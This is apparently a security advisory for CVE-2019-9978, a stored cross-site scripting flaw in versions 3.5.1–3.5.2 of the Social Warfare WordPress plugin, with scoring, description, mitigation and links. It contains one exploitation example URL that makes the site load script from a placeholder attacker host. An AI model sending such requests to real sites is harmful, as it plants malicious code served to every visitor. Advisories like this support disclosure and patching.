#VU18052 Cross-site scripting in WordPress Social Sharing Plugin – Social Warfare


Published: 2021-06-17 | Updated: 2023-08-21

Vulnerability identifier: #VU18052

Vulnerability risk: High

CVSSv3.1: 6.9 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:H/RL:O/RC:C]

CVE-ID: CVE-2019-9978

CWE-ID: CWE-79

Exploitation vector: Network

Exploit availability: Yes

Vulnerable software:
WordPress Social Sharing Plugin – Social Warfare
Web applications / Modules and components for CMS

Vendor: Warfare Plugins

Description

The vulnerability allows a remote attacker to perform cross-site scripting attacks.

The vulnerability exists due to usage of the eval() JavaScript call on data passed via the  "swp_url" HTTP GET parameter to "/wp-admin/admin-post.php" script, when "swp_debug" is set to "load_options", allowing to permanently inject and execute arbitrary JavaScript code on the website. A remote unauthenticated attacker can store a specially crafted JavaScript code into database and execute it in browser of every website visitor.

Note: this vulnerability is being actively exploited in the wild.

Exploitation example:

http://[host]/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[malicious_js_script]/

Mitigation
Update to version 3.5.3.

Vulnerable software versions

WordPress Social Sharing Plugin – Social Warfare: 3.5.1 - 3.5.2


External links
http://wordpress.org/support/topic/malware-into-new-update/
http://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exp...
http://twitter.com/warfareplugins/status/1108826025188909057
http://blog.sucuri.net/2019/03/zero-day-stored-xss-in-social-warfare.html


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

Yes. This vulnerability is being exploited in the wild.


Latest bulletins with this vulnerability